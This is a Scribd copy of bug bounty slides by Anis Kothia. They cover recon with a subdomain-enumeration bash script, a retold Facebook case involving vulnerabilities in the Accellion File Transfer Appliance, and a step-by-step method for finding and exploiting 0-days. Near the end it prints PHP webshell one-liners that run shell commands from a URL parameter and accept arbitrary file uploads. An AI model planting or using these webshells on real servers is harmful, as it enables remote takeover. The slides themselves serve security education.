Scribd
Upload
495 views14 pages

How To Find 0day Vulnerability

This document discusses bug bounty programs and ethical hacking. It provides information on popular bug bounty platforms, common vulnerabilities found, and strategies for conducting reconnaissance and testing applications. Specific examples are given of vulnerabilities found in the Accellion File Transfer Appliance, including cross-site scripting, SQL injection, and privilege escalation issues. Benefits to ethical hackers are highlighted such as monetary rewards, recognition, and career opportunities. The document argues that bug bounty programs provide value to customers through cost savings compared to full-time penetration testing, while also allowing hackers to work flexibly from anywhere in the world.

Uploaded by

AceAns
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
495 views14 pages

How To Find 0day Vulnerability

This document discusses bug bounty programs and ethical hacking. It provides information on popular bug bounty platforms, common vulnerabilities found, and strategies for conducting reconnaissance and testing applications. Specific examples are given of vulnerabilities found in the Accellion File Transfer Appliance, including cross-site scripting, SQL injection, and privilege escalation issues. Benefits to ethical hackers are highlighted such as monetary rewards, recognition, and career opportunities. The document argues that bug bounty programs provide value to customers through cost savings compared to full-time penetration testing, while also allowing hackers to work flexibly from anywhere in the world.

Uploaded by

AceAns
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 14

Presented by : Anis Kothia

How many of you know about bug bounty ?


How many platform are available for real time hacking ?
How many of you know about CVE ?
How many organization are providing bug bounty ?
How big Bug bounty industry is ?
Real Time Experience
Best Learning curve
Your research can be applied on Real Time
You earn money , you get CVE and you get Job.
Information Gathering : Public data exposed on web
Network Boundary
When I was doing some recon and research, not only did I look up the
domain names of Facebook itself, but also tried Reverse Whois. And to my
surprise, I found an INTERESTING domain name: tfbnw.net
It looked like TFBNW was an internal domain name for Facebook. Lets try to
enumerate the C Class IPs of vpn.tfbnw.net and found some interesting
servers, for example: files.fb.com
The below automate script finds all servers and their subdomain or various
host name. It finds out Ip address and network range of target.

#!/bin/bash
for name in $(cat subdomains-10000.txt);
do host $name.customername.com | grep "has address" | cut -d" " -f1,4 &
done > subdomain.txt
cat subdomain.txt | cut -d" " -f 2 | sort -u > subdomainip.txt
cat subdomainip.txt | cut -d"." -f1,2,3 | sort -u > subnetwork.txt
Accellion File Transfer Appliance
Vulnerabilities
The FTA Product with web-based user interfaces were mainly composed of
Perl & PHP
The PHP source codes were encrypted by IonCube
Fortunately, the IonCube version used by FTA was not up to date and could
be decrypted with ready-made tools.
He found 7 vulnerabilities
3 Cross-Site Scripting
Pre-Auth SQL Injection leads to Remote Code Execution
Known-Secret-Key leads to Remote Code Execution
2 Local Privilege Escalation
Benefit to This hacker :
1-2 week time and he earn 10,000$ from Facebook
Recognize at Facebook bug bounty hall of fame
Got popularity and improve his own brand Image in world of Information
Security
Find network range and find weak machine of Target
Check if any ready made vulnerability available on CVE sites and Metasploit
If no result from Black box testing , Go for white box testing
Find source code of product
Decrypt source code if required
Code review and debugging on local system
Prepare exploitation based on limitation set on Server (e.g. Shellcode , Webshell
or upload malicious image with hidden code)
Install that application on VM and verify vulnerability before trying on
Target(incase exploitation gets that server down that would be unethical)
Try your exploitation on target
Report Vulnerability
If it is 0day vulnerability , report to product team and report to site who provides
CVE.
wget https://files.fb.com/courier/B3dKe9sQaa0L.log
Webshell <?php echo shell_exec($_GET['c']); ?>
<?php move_uploaded_file($_FILES["f]["tmp_name"],
basename($_FILES["f"]["name"])); ?>
<?php include_oncce("/home/seos/courier/remote.inc"); echo
decrypt($_GET["c"]); ?>
Win-Win for Customer and Ethical Hacker
Customer do not hire full time pen tester or red team hence they save money
Customer pays for each bug that surface hence it is not per hour payment
but as per bug payment
Ethical hacker
Can work from anywhere in the world
Can work any time of day ( Many white hat hacker have full time job and they
do bug bounty in part time)
Can choose any customer they want based on their expertise
Trust Factor
Depart of Defense from USA is also recently joined Bug Bounty program
which shows that trust that organization has on this bug bounty platform.
Pen Testing industry is slowly adapting Let the best man win strategy (Fair
game play)

You might also like